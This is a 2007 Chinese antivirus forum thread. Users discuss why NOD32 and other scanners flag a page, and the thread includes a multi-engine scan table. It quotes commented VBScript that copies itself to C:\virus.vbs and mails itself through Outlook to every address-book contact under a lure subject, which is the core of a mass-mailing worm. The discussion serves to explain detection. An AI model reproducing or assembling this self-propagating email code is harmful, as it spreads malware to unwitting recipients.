未知脚本病毒？

显示全部楼层 · 发表于 2007-4-13 11:35:52

刚刚报的，点阻止以后，网页直接被NOD 32给屏蔽了。。。。

AhnLab-V3	2007.4.12.0	04.12.2007 [td]no virus found
AntiVir	7.3.1.50	04.12.2007 [td]no virus found
Authentium	4.93.8	04.12.2007 [td]no virus found
Avast	4.7.936.0	04.11.2007 [td]no virus found
AVG	7.5.0.447	04.12.2007 [td]no virus found
BitDefender	7.2	04.13.2007	Type_ScriptMailer
CAT-QuickHeal	9.00	04.12.2007 [td]no virus found
ClamAV	devel-20070312	04.13.2007 [td]no virus found
DrWeb	4.33	04.12.2007 [td]no virus found
eSafe	7.0.15.0	04.12.2007 [td]no virus found
eTrust-Vet	30.7.3564	04.13.2007 [td]no virus found
Ewido	4.0	04.12.2007 [td]no virus found
FileAdvisor	1	04.13.2007 [td]no virus found
Fortinet	2.85.0.0	04.13.2007 [td]no virus found
F-Prot	4.3.2.48	04.12.2007 [td]no virus found
F-Secure	6.70.13030.0	04.13.2007	VBS/GenMail.D
Ikarus	T3.1.1.5	04.12.2007 [td]no virus found
Kaspersky	4.0.2.24	04.13.2007 [td]no virus found
McAfee	5007	04.12.2007 [td]no virus found
Microsoft	1.2405	04.13.2007 [td]no virus found
NOD32v2	2185	04.13.2007	probably unknown SCRIPT virus
Norman	5.80.02	04.12.2007	VBS/GenMail.D
Panda	9.0.0.4	04.12.2007 [td]no virus found
Prevx1	V2	04.13.2007 [td]no virus found
Sophos	4.16.0	04.12.2007 [td]no virus found
Sunbelt	2.2.907.0	04.07.2007 [td]no virus found
Symantec	10	04.13.2007 [td]no virus found
TheHacker	6.1.6.088	04.09.2007 [td]no virus found
VBA32	3.11.3	04.12.2007	Email-Worm.VBS.Doggy#1
VirusBuster	4.3.7:9	04.12.2007 [td]no virus found
Webwasher-Gateway	6.0.1	04.13.2007 [td]no virus found

显示全部楼层 · 发表于 2007-4-13 11:44:39

好好笑。。
不会因为这句话nod就说是病毒吧。。

难道nod也用的是所谓的关键字技术？？
本编程的人就可以修改其代码，形成各种各样的变种。
下面以一个简单的脚本为例：
Set objFs=CreateObject （“scripting.FileSystemObject”）(创

建一个文件系统对象)　　objFs.CreateTextFile

（"C:\virus.txt", 1）(通过文件系统对象的方法创建了TXT文件)　

　如果我们把这两句话保存成为.vbs的VB脚本文件，点击就会在C盘

中创建一个TXT文件了。倘若我们把第二句改为：
objFs.GetFile （Wscript.scriptFullName）.Copy

（"C:\virus.vbs"）
就可以将自身复制到C盘virus.vbs这个文件。本句前面是打开这个脚

本文件，Wscript.scriptFullName指明是这个程序本身，是一个完整

的路径文件名。GetFile函数获得这个文件，Copy函数将这个文件复

制到C盘根目录下virus.vbs这个文件。这么简单的两句就实现了自我

复制的功能，已经具备病毒的基本特征——自我复制能力。

显示全部楼层 · 发表于 2007-4-13 11:51:25

对于经常不仔细看帖和主题的朋友来说，好笑是正常的。

显示全部楼层 · 发表于 2007-4-13 11:59:22

简单了做了个定位，实际nod是对

Set objOA=Wscript.CreateObject （"Outlook.Application"）（创

建一个OUTLOOK应用的对象）
Set objMapi=objOA.GetNameSpace （"MAPI"）（取得MAPI名字空间

）
For i=1 to objMapi.AddressLists.Count（遍历地址簿）
Set objAddList=objMapi.AddressLists （i）
For j=1 To objAddList. AddressEntries.Count
Set objMail=objOA.CreateItem （0）
objMail.Recipients.Add （objAddList. AddressEntries （j））

（取得收件人邮件地址）　　objMail.Subject="你好!" （设置邮

件主题，这个往往具有很大的诱惑性质）
objMail.Body="这次给你的附件，是我的新文档！" （设置信件内容

）
objMail.Attachments.Add （“c:\virus.vbs"）（把自己作为附件

扩散出去）
objMail.Send　　（发送邮件）
Next
Next
Set objMapi=Nothing　　（清空objMapi变量，释放资源）
set objOA=Nothing　　(清空objOA变量)

这句话过敏

[ 本帖最后由 mofunzone 于 2007-4-12 20:06 编辑 ]

显示全部楼层 · 发表于 2007-4-13 12:05:33

刚打开帖子就报了

显示全部楼层 · 发表于 2007-4-13 12:07:22

原帖由 观弈书童 于 2007-4-12 20:05 发表
刚打开帖子就报了

和你说了
关键字技术罢了。。

显示全部楼层 · 发表于 2007-4-13 12:08:42

太敏感了

显示全部楼层 · 发表于 2007-4-13 12:11:21

原帖由 观弈书童 于 2007-4-13 12:05 发表
刚打开帖子就报了

高效能。。。

显示全部楼层 · 发表于 2007-4-13 12:18:39

还好我没用NOD

显示全部楼层 · 发表于 2007-4-13 12:26:58

绝大多数杀软都采用关键字技术的

[病毒样本] 未知脚本病毒？

本帖子中包含更多资源

回复 #2 mofunzone 的帖子

回复 #3 曲中求的帖子

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

[病毒样本] 未知脚本病毒？

本帖子中包含更多资源

回复 #2 mofunzone 的帖子

回复 #3 曲中求 的帖子

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源

回复 #3 曲中求的帖子